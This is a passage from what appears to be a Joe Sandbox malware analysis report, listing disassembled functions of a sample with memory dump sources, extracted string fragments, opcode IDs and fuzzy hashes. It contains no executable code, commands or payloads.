                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4@$4@$4@$4@$4@$6$L@$L@$L@$L@$TX@$TX@$TX@$TX@$X@$d$t@$t@
                                                                                        • API String ID: 0-2882190007
                                                                                        • Opcode ID: 9aa9f25135e4b911913b7a07eca6c7fd18fbb16b067e7b24a688b09fb023502b
                                                                                        • Instruction ID: 1c52104b21123b49bafaf6bd962fd91106d0d4c4c1097a4f7a58cb8d9edd2ec6
                                                                                        • Opcode Fuzzy Hash: 9aa9f25135e4b911913b7a07eca6c7fd18fbb16b067e7b24a688b09fb023502b
                                                                                        • Instruction Fuzzy Hash: A8033BB6900219DFDB25DF90DD48BEEB7B8FB48301F0081E9E54AB6160EB745A89CF54
                                                                                        Function 00417004 Relevance: 15.8, Strings: 12, Instructions: 812COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $y@$,t@$4Z@$8r@$D]@$LZ@$`t@$r$|Z@$|Z@$|Z@$|Z@
                                                                                        • API String ID: 0-1716365018
                                                                                        • Opcode ID: 94bc0d62b3ced20b64a233dae9f2a10486dede8fb286201ab7c85cd8d7652bfd
                                                                                        • Instruction ID: 02d8adc499fd58e5f26fc75ebfb6aa2703631529fd68e8aa7c94da017a16a4d2
                                                                                        • Opcode Fuzzy Hash: 94bc0d62b3ced20b64a233dae9f2a10486dede8fb286201ab7c85cd8d7652bfd
                                                                                        • Instruction Fuzzy Hash: BD822775900119DFDB24DF60DD88BEEB779FB48305F0081EAE50AA6260EB745B89CF58
                                                                                        Function 00444730 Relevance: 12.4, Strings: 9, Instructions: 1177COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (@$E$TX@$TX@$`7@$d$h@$t@$@
                                                                                        • API String ID: 0-658975200
                                                                                        • Opcode ID: 78c8e7ea3f6e302dd1a4a95a735a3bb121f3f424cd23f241ed9cc064416472ef
                                                                                        • Instruction ID: ff3d3ff346b0417cf66589cb3514612c06a373764a037f2f6ab34170f2479345
                                                                                        • Opcode Fuzzy Hash: 78c8e7ea3f6e302dd1a4a95a735a3bb121f3f424cd23f241ed9cc064416472ef
                                                                                        • Instruction Fuzzy Hash: 06C22AB5900219DFDB24DFA0DD48BDEB7B4BB48304F0081EAE54AA7261DB745A89CF54
                                                                                        Function 004112D0 Relevance: 8.0, Strings: 6, Instructions: 548COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 9$P$TX@$Z$o$`@
                                                                                        • API String ID: 0-570401890
                                                                                        • Opcode ID: c59cc0589e701b609baa57fc46eb9e8803969c48916786af096730894a9623dd
                                                                                        • Instruction ID: ea8f509ab24611ea4d5324bb326b7a2738f2309239e9417ae11b2dee5cff386c
                                                                                        • Opcode Fuzzy Hash: c59cc0589e701b609baa57fc46eb9e8803969c48916786af096730894a9623dd
                                                                                        • Instruction Fuzzy Hash: 11422FB5910608DBDB14DFA0DE48BDDB7B5FB44304F1081AEE606B72A0DB785A89CF58
                                                                                        Function 00445C30 Relevance: 8.0, Strings: 6, Instructions: 465COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $@$$@$T@$T@$d$t@
                                                                                        • API String ID: 0-3973645323
                                                                                        • Opcode ID: f76e46e67b032d390e4d270a16b17502feea2b8a85a5cdd9cc334175c25a1a20
                                                                                        • Instruction ID: dd7808f41fa8c0eeeb8498d0c7b95f39f6eab288042ebefad56573b5168ff57f
                                                                                        • Opcode Fuzzy Hash: f76e46e67b032d390e4d270a16b17502feea2b8a85a5cdd9cc334175c25a1a20
                                                                                        • Instruction Fuzzy Hash: 012207B5D00208DBDB14DFE0DD48BEEB7B8BB48304F10856AE506BB2A4EB745A49CF54
                                                                                        Function 00415004 Relevance: 7.1, Strings: 5, Instructions: 874COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $j@$$j@$J$xj@$xj@
                                                                                        • API String ID: 0-3795750114
                                                                                        • Opcode ID: 29b5d860587b19e39a0a78acbe0be446abb257bc4d87f53bf6e92e3b0d0a9084
                                                                                        • Instruction ID: 6e4578b8143c235f665be6b5056b9394ccae0c7b64b28781fa3c6cf98c53bfd7
                                                                                        • Opcode Fuzzy Hash: 29b5d860587b19e39a0a78acbe0be446abb257bc4d87f53bf6e92e3b0d0a9084
                                                                                        • Instruction Fuzzy Hash: CEA20774901228CFDB24DF64DD88BD9B7B5BB89300F1081EAE50AB7260DB745AC9CF59
                                                                                        Function 00415095 Relevance: 7.0, Strings: 5, Instructions: 797COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $j@$$j@$J$xj@$xj@
                                                                                        • API String ID: 0-3795750114
                                                                                        • Opcode ID: ae3b1c439437dfb889132403140e6c841fcd2eb7c509f028fffbe4ca1f5b2661
                                                                                        • Instruction ID: 7d83ba14c33e25c57b06654f82dd50372809f523bbc084aa682785b92fec1393
                                                                                        • Opcode Fuzzy Hash: ae3b1c439437dfb889132403140e6c841fcd2eb7c509f028fffbe4ca1f5b2661
                                                                                        • Instruction Fuzzy Hash: 1F820774A11228DFDB24CF54DD84BE9B7B5BB89300F1081EAE50AB7260DB745AC9CF58
                                                                                        Function 0043F63C Relevance: 6.7, Strings: 4, Instructions: 1651COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: d$|Z@$|Z@$|Z@
                                                                                        • API String ID: 0-3115596615
                                                                                        • Opcode ID: a7505f40eb5c87957d452d50a37c106f3671e217cb8b996e77df24c3ab496a56
                                                                                        • Instruction ID: 0aff88c405747ae49392ec6cea733226a2ca0702a0d49b616347433ccb3aca6e
                                                                                        • Opcode Fuzzy Hash: a7505f40eb5c87957d452d50a37c106f3671e217cb8b996e77df24c3ab496a56
                                                                                        • Instruction Fuzzy Hash: 39F23C74910209DFDB14DFA4DD88AEEB7B5FB48300F1081AEE506B72A4DB749989CF58
                                                                                        Function 0043F674 Relevance: 6.5, Strings: 4, Instructions: 1539COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: b$|Z@$|Z@$|Z@
                                                                                        • API String ID: 0-424797338
                                                                                        • Opcode ID: e8de621715178ab71f48e5e053ba954f61952f73b1fd7c015dfd8bfa3592b313
                                                                                        • Instruction ID: 0887818eda884fefa293a5a39dc3afc720f8d23f278cb9a19ff1bbbf1977a3c1
                                                                                        • Opcode Fuzzy Hash: e8de621715178ab71f48e5e053ba954f61952f73b1fd7c015dfd8bfa3592b313
                                                                                        • Instruction Fuzzy Hash: 2AE25B74910208DFDB14DF94DD88AEEB7B5FB49300F20816EE506B72A4DB74A989CF58
                                                                                        Function 0043F7BE Relevance: 6.5, Strings: 4, Instructions: 1479COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: b$|Z@$|Z@$|Z@
                                                                                        • API String ID: 0-424797338
                                                                                        • Opcode ID: 64ec57cec899ef7da02cb7f00427a2033e2e3f9b60be90481794469dddfcf89b
                                                                                        • Instruction ID: 2c2188422eee94a94cd2461ad7a5741f1235ff970ad26cb30f8ece74f5dd2c32
                                                                                        • Opcode Fuzzy Hash: 64ec57cec899ef7da02cb7f00427a2033e2e3f9b60be90481794469dddfcf89b
                                                                                        • Instruction Fuzzy Hash: E9E24A75910208DFDB14DF94DD88AEEB7B5FB48300F20816EE506B72A4DB74A989CF58
                                                                                        Function 00446AC0 Relevance: 6.4, Strings: 5, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: :@$6:@$d@$h9@$x9@
                                                                                        • API String ID: 0-3421527952
                                                                                        • Opcode ID: 4b72653663b6e768bd9d2e603a81023ecefbab04f1b981647955fc70476059e7
                                                                                        • Instruction ID: 50fd94e6cbfad0ad74ccdba510aba3135a62df39b13d62bf9932d455abba2249
                                                                                        • Opcode Fuzzy Hash: 4b72653663b6e768bd9d2e603a81023ecefbab04f1b981647955fc70476059e7
                                                                                        • Instruction Fuzzy Hash: 6D51E7B2D0020CABDB04EFA5DD859DEBBB9FF58704F10852AE502B3154EA34AA45CF64
                                                                                        Function 00439001 Relevance: 4.8, Strings: 3, Instructions: 1066COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: D]@$D]@$D]@
                                                                                        • API String ID: 0-2617234468
                                                                                        • Opcode ID: d0b4626022a74d7db5932eb756fdfd3c333593cd5b25e93ee794915de4b92365
                                                                                        • Instruction ID: 97a9299f1ddc39dab798ebdd237f5567ff6815621847c6dca89605a29430b381
                                                                                        • Opcode Fuzzy Hash: d0b4626022a74d7db5932eb756fdfd3c333593cd5b25e93ee794915de4b92365
                                                                                        • Instruction Fuzzy Hash: 62B20775900218DBDB14DFD0DD98ADEB7B8BF48304F1081AAE506BB264EB746A4ACF54
                                                                                        Function 004322A0 Relevance: 4.6, Strings: 3, Instructions: 866COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
